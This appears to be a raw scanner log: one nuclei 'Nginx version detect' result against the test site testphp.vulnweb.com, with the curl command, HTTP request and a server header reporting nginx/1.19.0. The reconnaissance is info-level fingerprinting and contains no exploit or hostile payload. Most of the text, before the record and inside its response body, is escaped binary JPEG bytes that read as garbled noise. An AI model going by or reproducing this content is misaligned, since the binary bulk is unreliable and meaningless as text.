\ufffdNVȻ\\u0013\\ufffd9\\u0004\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd7W\\ufffd\\u0000,\\ufffd,\\ufffd\\ufffd_zG\\u000cP@\\ufffd!\\ufffd\\u0004h\\ufffd\\ufffd\\n\\u0005\\u0001}\\ufffd;\\ufffdp\\ufffd,\\ufffd\\ufffdd\\ufffd\\ufffdZ\\ufffdO\\u0003\\ufffdj\\u003c\\ufffdt\\ufffd\\u0008\\ufffd\\u0000A2\\u001a\\ufffd\\u0013|u\\ufffd+\\ufffd\\ufffd*\\ufffdS\\ufffdԐ\\u0011\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffd?A\\ufffdV2\\t\\ufffd,\\ufffd\\u0015\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffdA\\ufffdZy\\ufffd\\ufffd\\ufffd\\ufffdd'k*\\ufffd-\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\u0016E\\ufffdS\\u0011C\\u000b\\ufffd%\\ufffd\\ufffd\\ufffd_\\ufffd}\\ufffd50j\\u0016#\\ufffdi\\ufffdƀ\\ufffd\\ufffd\\ufffdW\\ufffdU\\ufffd\\ufffdj\\ufffdy\\ufffd1\\u000b\\u0006\\ufffd\\ufffd\\u0013\\ufffd\\ufffd$\\ufffd\\ufffd2Q\\ufffduA\\ufffd\\ufffdP\\ufffd\\ufffdI\\ufffd2\\u0000i=\\ufffd\\u001b\\ufffd\\ufffd\\rq\\ufffdh\\ufffdP+\\ufffd\\t\\ufffd\\ufffd$\\ufffd\\ufffd\\r$\\ufffd\\ufffd\\ufffdx\\ufffd`\\ufffd\\ufffd\\u0001\\u0007\\ufffd\\u0004U\\ufffd\\ufffd\\ufffd\\ufffdp\\u0004E\\ufffdԄt8\\ufffdDl!\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\ufffd%\\ufffdj\\u0026\\ufffd\\u001eÓҸ\\u001c\\ufffd\\u0005\\ufffd\\ufffduh\\ufffdeT\\u0008y\\ufffd\\ufffdہ\\u0016v\\ufffd\\ufffd]\\ufffd\\ufffd;\\ufffd\\ufffd\\ufffdk\\ufffd^\\ufffd\\ufffd/#6\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffd\\u0008\\u0015`\\u0002\\u0000\\ufffdx\\u0007\\ufffd8\\ufffd{\\u003c\\ufffd\\u0007\\u0006\\ufffd\\u0015\\ufffd\\ufffd\\ufffdZD\\ufffd\\u0002Á\\ufffdZ\\ufffdYv\\ufffd3X\\ufffdx\\ufffd]\\ufffd\\u000b9:v\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\u001fo\\ufffd\\ufffd*\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl'\\ufffd\\ufffd\\ufffd\\u0015d\\ufffd)\\ufffdXC\\ufffd\\ufffd\\ufffd\\ufffdA?\\ufffd[\\ufffd;\\u001e0̆\\ufffd\\u0006\\ufffd\\ufffd\\ufffd{$\\ufffd:\\u0011~E\\ufffd\\u001eˌE_\\ufffd:\\ufffdcd\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd@\\t x\\u001f\\ufffdZX\\ufffd0\\ufffd\\ufffd\\ufffdr\\u0008\\ufffd\\u000b\\u0026\\ufffdX5q\\ufffd\\ufffdW\\ufffd\\ufffd\\u00114!Ķ(\\u000b\\ufffdP\\ufffd\\u0015\\ufffd\\u0000!`\\ufffd\\u000cQP\\ufffd\\ufffd\\u0016]\\ufffd\\ufffd\\ufffdS@(n\\ufffd\\u0015\\u003c\\ufffd?sB\\ufffdh\\ufffd\\ufffd\\ufffd\\ufffd=\\u001e,\\ufffd\\u0026\\ufffd63\\ufffd\\ufffd׿mO\\ufffdȅ\\t \\u0000I\\ufffdC\\u001c\\ufffd\\ufffd\\u0010\\ufffdɽ\\ufffdŀ꠆\\ufffdu\\u0004\\u001a\\ufffd#\\ufffd\\ufffd|\\ufffd`j\\ufffd\\ufffdT\\ufffd\\u0014h\\ufffd1=\\ufffd\\u0004W ݃\\ufffd\\u0026󷦱\\ufffdfU\\u0014\\u000b\\ufffd\\ufffd#\\ufffdO'\\ufffd\\ufffd\\u0000F\\ufffd\\u003ey\\ufffd\\u0013\\ufffd1\\ufffd\\ufffd\\ufffd|\\ufffd\\u0026U\\u0004\\ufffd`,{\\ufffd\\n8\\u0000\\ufffdg\\ufffd$\\ufffd\\ufffd\\ufffdN\\ufffd!sjň\\u00062\\ufffd]\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000Uu\\ufffds\\ufffd\\ufffd\\ufffd\\ufffds\\ufffd`t%\\ufffdT\\ufffd\\u001bzr\\ufffd\\ufffd\\ufffd\\u001bd$h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\ufffd鿱Q\\ufffd\\ufffdZ2\\ufffd\\ufffdJ\\ufffdE3\\ufffd\\u0000.\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\njd3\\u0015\\ufffdL\\ufffd\\ufffdR\\ufffdE\\ufffd\\ufffdd\\ufffd\\u001cw\\u003cp:_$N҅\\ufffdNc\\u0006\\ufffd\\ufffd\\nO\\ufffd\\ufffd\\ufffdT\\ufffd5\\u0008\\ufffdG#iF\\ufffd\\u0011?.\\ufffd\\ufffd\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdY\\ufffdy\\u001c\\ufffd̞h*gf\\u0014\\ufffd3-\\ufffdN\\ufffd\\ufffd#B;\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdb\\u00074t\\ufffdE\\ufffdP\\ufffdʦ3 \\ufffd\\ufffdv\\ufffd\\ufffdH\\u0004\\u000b\\ufffd\\u0016y=,\\ufffd\\ufffd\\ufffd\\u0014\\ufffd\\\"x\\ufffd\\u0002\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0005J\\ufffd\\u003c\\ufffd$\\ufffd\\u0004U^Dح\\ufffdכ\\u001dc\\ufffdc\\u001aK\\ufffd\\ufffdK_\\ufffd\\ufffd\\ufffd9^\\u0018\\ufffdW\\ufffdaZ\\ufffd]\\ufffd\\ufffdԶ’\\u0002\\ufffdT\\ufffd\\u0006(y\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\ufffd9c\\u001c\\u003c\\ufffd\\u0014\\ufffd\\ufffd\\ufffd,\\ufffdt\\ufffd\\ufffdY\\ufffd\\ufffd_o\\u0019\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd7\\ufffd\\ufffdb\\ufffdT\\ufffd\\ufffdcma\\ufffd\\ufffdq\\ufffdY\\ufffd^\\u0017\\ufffd\\ufffdN#V+\\ufffdq\\ufffd.\\ufffdC\\\"\\ufffd\\ufffd\\ufffdL\\u0008\\ufffdM\\ufffd\\ufffd:\\u0002~\\ufffdk\\ufffd|\\ufffd}\\ufffdxA\\ufffd*\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\ufffdY\\u00022\\ufffd*\\ufffd\\u0004\\n6\\ufffd\\ufffd\\u0001\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\u000e+\\ufffdI\\u001e\\ufffdT\\u0004\\u0006\\ufffd*\\ufffdt\\ufffd/8Xb\\ufffd\\ufffd\\u000c\\ufffdakr\\ufffd\\ufffdV4\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffdCvp\\ufffd\\ufffd.W\\ufffd\\u0008\\u001a\\u0000\\ufffd\\r\\ufffd\\ufffd5F\\u0016\\ufffd7F\\ufffdo[\\ufffd\\u001d\\ufffd#\\ufffd\\ufffdw}1\\ufffd\\ufffdn\\u0010MHٛ\\ufffd\\ufffd\\ufffdk\\ufffd\\ufffdL\\ufffd,\\u0000Z\\ufffd\\ufffd\\u0005\\u0014Esȫ\\u0007\\ufffd:x\\ufffdk\\ufffdU\\ufffd\\ufffdh\\ufffd~ߘ\\ufffd\\ufffd\\ufffd^*\\ufffd\\ufffd\\u0019\\ufffd\\ufffd8X\\ufffd\\ufffd\\ufffd|x4L:\\ufffdGa\\ufffd\\ufffd\\ufffd\\ufffd]Z\\ufffd\\u001b,jC9\\ufffd!\\ufffd\\u001e\\u0008\\ufffd\\ufffd\\ufffd\\ufffdŞVaL\\ufffd\\ufffd\\ufffdQg9~p\\u000c\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\u0019\\ufffd\\u001a\\ufffd\\ufffdl\\ufffdp\\ufffd\\u0018\\ufffd\\u0000Q\\ufffd\\u000c1'F\\u0018a\\ufffd$g\\u0018\\ufffd\\u0018c\\u0014\\ufffdu\\u001d\\ufffd\\ufffdo\\ufffd\\u0018bR\\ufffd\\ufffd\\ufffd\\u0018`\\ufffdF\\u0018a\\ufffd$a\\ufffd\\u0018\\ufffdFr\\ufffd\\u0018bF\\ufffda\\ufffd\\u0018(\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:53.649353268Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/9.1.2 Safari/602.3.12' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"path\":\"/pictures/8.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /pictures/8.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4139\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:34:53 GMT\\r\\nEtag: \\\"4dca64a1-102b\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0003\\u0004\\u0005\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u0000;\\u0010\\u0000\\u0001\\u0003\\u0002\\u0004\\u0002\\u0006\\u0008\\u0005\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0005\\u0012!1AQ\\u0006\\u0013\\\"aq\\ufffd\\u00142T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$B\\ufffd\\ufffd\\ufffd\\u0015#3\\ufffdRb4r\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000(\\u0011\\u0000\\u0002\\u0001\\u0003\\u0003\\u0004\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011!\\u0004\\u00141\\u0005\\u0012AQ\\u0013\\u0015\\\"B2ab\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdS\\ufffdK\\ufffd\\ufffd@\\ufffd\\u001bU\\u0010z\\ufffd~\\u001d*D\\ufffd\\ufffd\\ufffd@e\\ufffd\\ufffd\\u0012+\\ufffdoQ\\ufffd\\ufffdVߩ\\ufffd}I\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{9%L\\ufffdOy\\u0014ÃX\\ufffdz\\ufffd?\\ufffd\\ufffdh\\ufffd\\\"2\\ufffd\\ufffd0\\u000f\\ufffd5ޤѺ\\ufffd\\u000bU\\ufffd\\ufffdZ|\\u000c\\ufffd\\ufffd\\ufffdvv\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\u0003)\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdR\\ufffd\\ufffd\\ufffdEã\\ufffdo\\ufffdt\\u001f\\u0014\\nc\\ufffd5\\ufffduB\\ufffd\\u000fq\\ufffd\\ufffd\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffdt\\ufffdH\\ufffd)\\ufffdl\\u0007\\ufffd\\ufffd N\\u0015{\\u001e\\ufffd\\u0003\\ufffdU]\\ufffd7\\u0012`\\ufffd\\tM\\ufffd\\ufffdaT\\ufffd\\ufffdh\\ufffdk\\ufffd-\\u0026\\u001el)=\\ufffd\\u0002\\ufffdF\\u0013k\\ufffd\\ufffd\\u0000\\u0018\\ufffd\\ufffd\\u0000\\ufffdW6\\ufffd\\ufffd$\\ufffd\\ufffdS\\ufffd\\ufffdu\\ufffd\\u000ey\\ufffdeQ\\ufffd\\ufffd\\u0015\\ufffdI9g\\ufffd\\ufffd\\u0017\\ufffd0$\\ufffd\\u0015\\ufffd\\ufffd56\\u000c\\ufffdm\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdN\\ufffdOq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdƲh|\\ufffd\\ufffd\\ufffdI/2\\u001a,-\\ufffd\\ufffd\\ufffd$w\\u001d~uE\\ufffd[ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\u003c\\ufffdH\\ufffd\\u000c\\ufffd\\ufffd\\u0000;\\ufffd\\u0015R+.A\\ufffd\\ufffdG.F\\u0018K\\u0003vTڞ\\ufffde\\u0013\\ufffd\\ufffd\\u003e\\u0000\\ufffd\\u0002p\\u0007`\\ufffd_\\ufffd:\\ufffd\\u0018\\u0002\\ufffd\\u00000A\\ufffdދ\\ufffdC\\ufffd\\\\!\\ufffd\\u001eJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffdH\\ufffdU+Z\\ufffdwQkXBS\\ufffdm\\ufffd\\u0014װ\\ufffd3B\\ufffdȎ\\u0019\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd+J7\\ufffd\\t\\ufffd\\u0000\\ufffdhI\\ufffd\\ufffd\\ufffd\\u0016j\\u0003\\ufffdG΋\\ufffd\\ufffd{C?\\u0018\\ufffd\\u0013`6\\ufffdd\\ufffd\\ufffd3\\ufffd=s\\ufffd\\ufffd`\\ufffd\\ufffd(\\ufffdȟ3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001b'\\ufffd\\ufffdwཥ\\ufffd\\ufffdW\\u0005\\ufffdM|b\\ufffd\\ufffd\\u001fW\\u0000\\u003cظ\\u0007\\ufffd\\t\\ufffd\\u0015Q\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001e%?J3\\ufffd\\u000f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u000e7\\u000c\\ufffdb\\ufffdօt\\ufffd 3\\ufffd.\\u0006\\ufffd\\ufffd\\ufffd趹\\u001f\\ufffd\\ufffd\\ufffd\\ufffdFYl=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdB\\ufffd\\ufffd\\ufffdYO\\ufffd\\u001f\\ufffd\\ufffd\\ufffdC_:i\\ufffd\\ufffdײ\\ufffd\\ufffdFY,=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdb\\ufffd\\ufffd\\ufffdYO\\ufffd\\u0012\\ufffd\\u0007\\ufffde@Gq\\ufffdՅ\\ufffd\\u0026G\\ufffd\\ufffd\\ufffd[\\u000fhg\\ufffd\\u0014\\ufffdX{C?\\u0018\\ufffd\\ufffd\\u0019t\\ufffd \\u00118j\\ufffd\\u0012\\ufffd\\u0011\\ufffdjSa;2G\\ufffd\\u0013F\\ufffd,=\\ufffd\\ufffd\\ufffdRɇ\\ufffdC?\\u0018\\ufffd\\ufffd#\\ufffd\\ufffd`8\\ufffdZOe$yԨ\\ufffdRwfO2h\\ufffd%\\ufffd\\ufffd3\\ufffd\\ufffdYp\\ufffd\\u0000hg\\ufffd\\u00147\\ufffd}6\\ufffd\\ufffd\\u0010\\u000c(\\ufffd\\ufffd\\u001esK\\ufffd\\ufffdDe\\u0003\\ufffdQ\\ufffd\\u0016#k\\ufffd~1K\\ufffd^\\ufffd\\ufffd\\ufffd(oE\\ufffd\\ufffd~\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdOvSL\\u00188V\\ufffd\\u0008O\\ufffd@\\ufffd\\ufffd{K_\\u0018\\ufffdE\\ufffd\\ufffd埌Q\\ufffd1\\ufffdNH\\ufffd\\u001c\\ufffd\\ufffd\\ufffd M\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffd;W$\\ufffdӷ\\ufffd\\r\\ufffd\\rZ\\ufffd$;m\\ufffdc(\\n\\ufffdT\\u0001\\ufffdI\\ufffd4\\ufffd\\ufffd~\\ufffd\\ufffdŅ\\ufffd׽z\\u0016\\ufffd\\u0014 \\u0001\\u0000\\ufffdE\\ufffd$\\ufffdxk\\u001bl8p\\ufffdϨR\\ufffd\\u0008\\ufffd\\u001d-Ŵ;\\ufffd\\ufffd\\ufffdL!\\ufffd\\ufffdV\\u0016\\ufffd\\u0002\\ufffd+\\ufffd\\u0003\\ufffd\\ufffd\\u001f|\\ufffdu\\ufffd\\ufffdb\\u0008k\\ufffd.:\\ufffd\\u0008\\ufffdLƁZ\\ufffdЃ\\ufffdX\\ufffd\\ufffd\\ufffdh/\\ufffd\\ufffd\\ufffd.B\\ufffdeH))!! H\\ufffd!;lg\\ufffd0▪E\\ufffd}P}\\ufffd(\\ufffd\\ufffd\\ufffd)#(%[\\u001d\\ufffd\\ufffd\\ufffdYWQ\\ufffdJ\\ufffd.\\ufffd\\ufffd\\u0000\\ufffd]\\ufffd\\ufffdb/\\u0007\\u0002\\u001cs\\ufffd@P$\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffd\\u0012\\ufffdSM\\ufffd^\\u000e-A\\u0000\\t܉\\ufffdG\\u0018\\ufffd\\u0016\\ufffd\\ufffdo\\u001crԼ\\ufffdE\\ufffdu\\ufffd+*\\ufffd\\ufffd\\ufffd\\u0000F\\ufffd.\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd˶\\ufffd\\u001a\\ufffd\\ufffd-#+\\ufffd7\\u0004J\\u0013\\ufffda\\u001a\\ufffd \\ufffd\\ufffd\\u0002$M\\tu\\u0019\\ufffd\\ufffd\\ufffd;e\\ufffd\\ufffdYx\\ufffd(\\ufffd6\\u001c\\ufffd!\\u0004\\ufffdY\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u000cN\\ufffd\\u0019E\\ufffdn\\ufffd\\ufffd#\\ufffdm\\ufffd\\ufffd9\\ufffd\\ufffd\\ufffdH1\\ufffd\\u001f\\ufffd\\ufffdڠ\\ufffd\\ufffdɈ\\ufffd\\ufffd\\ufffd[j\\u0015\\ufffd!\\ufffd0\\ufffd\\ufffd\\u0003\\u0007\\ufffd\\u0026\\\"\\u000e\\ufffdj)\\ufffd8\\ufffd\\ufffdIq\\ufffdf\\ufffd\\ufffd}\\ufffd\\ufffd\\u0008\\n'|\\ufffd\\ufffd\\ufffd\\ufffdY+7r\\ufffdJ\\u0017\\ufffd7\\ufffdI\\ufffdU~\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGajȩ\\ufffd\\u003e`x\\ufffd\\ufffdĶ\\ufffd\\ufffd8\\ufffd\\ufffd6\\ufffd]:P\\ufffdFE\\ufffd+*Q\\ufffd\\u0012F\\ufffd\\u00065\\u0010\\ufffdTq\\ufffdC\\u0007yƔ\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0011\\ufffd=\\ufffd\\ufffd\\u0019'\\ufffdy\\ufffdv\\ufffdl\\ufffdp\\ufffd_\\u000cqn+\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd$q\\u001eQ\\ufffd?\\u001aYW\\ufffd\\ufffd\\ufffd\\ufffd\\u000fd}\\u001a\\ufffd\\ufffdq7\\u0015\\ufffd\\ufffd۔\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\t\\u0002\\u000f\\u00025\\u001ae\\u001cF\\ufffd\\ufffd\\ufffd8\\ufffd$\\ufffd\\u0016\\ufffd\\ufffd\\\\C\\u0004f\\ufffd\\ufffd2\\ufffd\\u0008\\ufffd\\u001a\\ufffd5\\u0011\\ufffd\\ufffd\\ufffd\\u0002\\ufffd\\ufffdî[\\ufffdKL\\ufffdխh%N\\u0013\\ufffdh\\ufffd\\u0004\\ufffd\\u001c\\u0001\\u0000o:\\ufffdd[\\ufffd]\\ufffdY\\\\\\ufffd\\ufffdбd\\ufffdW(\\u0005\\ufffd\\ufffd\\u0003S\\ufffd\\t\\ufffd\\u0013\\ufffd\\ufffdŨ\\ufffd{\\ufffd\\u0013\\ufffd\\u003cX4\\ufffd\\ufffd1\\u000b\\ufffd\\ufffd,ߘ\\u0004\\ufffd\\ufffd\\ufffd\\u0000\\u0012\\ufffd\\ufffd\\u003c9H\\ufffd\\ufffd4\\ufffdX\\ufffd\\ufffd\\r\\ufffdp]Y\\ufffd\\u0003\\ufffd\\u0000\\u0019\\\"7\\ufffdQ\\ufffd\\u0015\\ufffd/\\ufffdww\\ufffdu,\\\\:۩\\ufffd\\u0008\\ufffd*ˤ\\ufffd7\\u0018\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd`k\\ufffd\\u001a]\\ufffd\\ufffdmEJ%Dd\\ufffd\\ufffd\\\"gS\\ufffd\\ufffd\\ufffd\\u0013\\ufffd=\\n\\ufffdhe\\ufffd\\ufffd1%J/\\u0016\\u000bn\\ufffdQ\\ufffd۾\\ufffd\\u001fq\\ufffd\\u003cم$\\ufffdj\\ufffd=.\\ufffdR\\ufffd/\\ufffdS\\ufffdhO\\u000e\\ufffd\\u0012\\ufffd$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZe'e\\r9@\\ufffd֯\\ufffdݦ'\\ufffd\\ufffd\\ufffd\\u0012P\\u0014\\ufffd\\u001c\\ufffd\\ufffd\\ufffdse\\ufffd\\ufffd\\u0003A\\ufffd\\ufffdjZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-4\\ufffd\\u0000Y\\u001bk\\ufffd\\ufffd\\ufffd\\u0000\\ufffdr\\ufffdTBGorv\\u001bӏK\\ufffd\\ufffd\\ufffd}I\\u0003i\\\\\\ufffd\\ufffd7\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffdT\\ufffd\\u00044\\ufffdk\\ufffd\\u001d\\ufffd$\\ufffd\\ufffd;N\\u0013vm\\u0014\\ufffd\\ufffd\\ufffdܘ\\ufffdGw\\u0012|\\u0006\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\n\\ufffd.\\ufffdp\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd皤\\u001d0\\ufffd*\\ufffd\\ufffd\\ufffd\\u001d\\ufffdSC\\u0016WV\\ufffdo\\ufffd9\\ufffd|\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffdC\\\"4\\ufffd\\ufffd\\ufffd\\u0013R\\ufffdv\\ufffd.\\ufffd\\ufffd\\u0019\\ufffd\\u001bG\\ufffd\\ufffdVHL\\u0002\\u0006i\\ufffd\\u0006\\ufffd\\ufffd\\ufffd\\ufffdޒ]B\\nV\\ufffd\\u0019i\\ufffdl\\ufffdβ\\ufffdF\\u0012\\u001ce\\ufffd\\ufffd\\ufffdЌ\\ufffd@\\u000e\\ufffd\\u003e\\u0014\\ufffd\\ufffd\\u0016\\ufffdYԄ\\ufffdⳒN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\u0016\\ufffdu\\ufffd\\ufffd\\ufffd\\u0010BB\\ufffd\\u001c\\ufffdT\\ufffd\\ufffd\\ufffd\\u001c7\\ufffd4.\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd(\\ufffdV\\u0008B3\\ufffd\\ufffd6\\ufffdغ\\ufffd\\ufffd/\\ufffd\\u0012îu\\ufffd\\ufffd$\\ufffdW]@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffda͵\\ufffd4\\u0014\\u001a\\ufffd\\u001ey\\ufffd\\n@\\ufffd'\\ufffd\\ufffd\\u000c\\ufffd\\u0004F\\ufffd\\ufffd\\u000e\\u001a\\ufffd{\\ufffd\\ufffd\\ufffdܦ\\ufffd(\\ufffd\\ufffdFl\\ufffd\\ufffd\\ufffd*ݻ*\\ufffd\\ufffdT\\u0014\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd*\\u0007\\ufffd\\u0006i\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0010\\ufffdt\\ufffd\\ufffd\\ufffd!qw\\ufffd\\ufffdݷ\\ufffd\\u003e\\ufffd\\t\\ufffdcI\\u0011\\ufffd\\ufffdY\\ufffd[\\u00168\\ufffd\\ufffd-\\u0015t\\ufffd\\u003e\\ufffd\\ufffdP\\ufffdҳ\\u0015\\u0026`(\\ufffd\\u001a\\ufffd\\ufffdüP-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdH\\u001dA=\\ufffd\\ufffdӕ\\u0016٭\\ufffdp\\ufffdmՙ\\ufffdtR\\u0002\\ufffd\\ufffd\\ufffd\\u000f\\ufffdw\\ufffd\\ufffd\\ufffd8G)\\u0007\\ufffdK\\ufffd]N4\\ufffdWn\\ufffd\\u0010\\ufffd\\u0003,\\ufffd\\u000cs\\u0007]\\ufffd3\\\"^HPK\\ufffdF\\ufffdH\\u001a\\ufffdp\\ufffdoDNa]K\\ufffd2\\ufffd\\ufffdHP\\u0008\\ufffd\\ufffdy\\ufffd}\\ufffd\\ufffdU\\ufffd,57=Z\\ufffdn\\ufffd\\ufffd1\\u0019c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\u0016\\u0001c\\n͉\\ufffd\\u0016\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\u0008\\ufffd\\ufffdJں\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdB\\u000bn%3\\u0005\\u0000\\ufffdF\\ufffd{ֵ\\ufffd\\u001bl\\u0008B\\u0019lI\\ufffd\\ufffd))H\\ufffd\\ufffd\\u0003a\\ufffd\\u001d\\ufffd\\ufffdS\\\\\\ufffdn\\u001dYm$+)\\ufffd刐 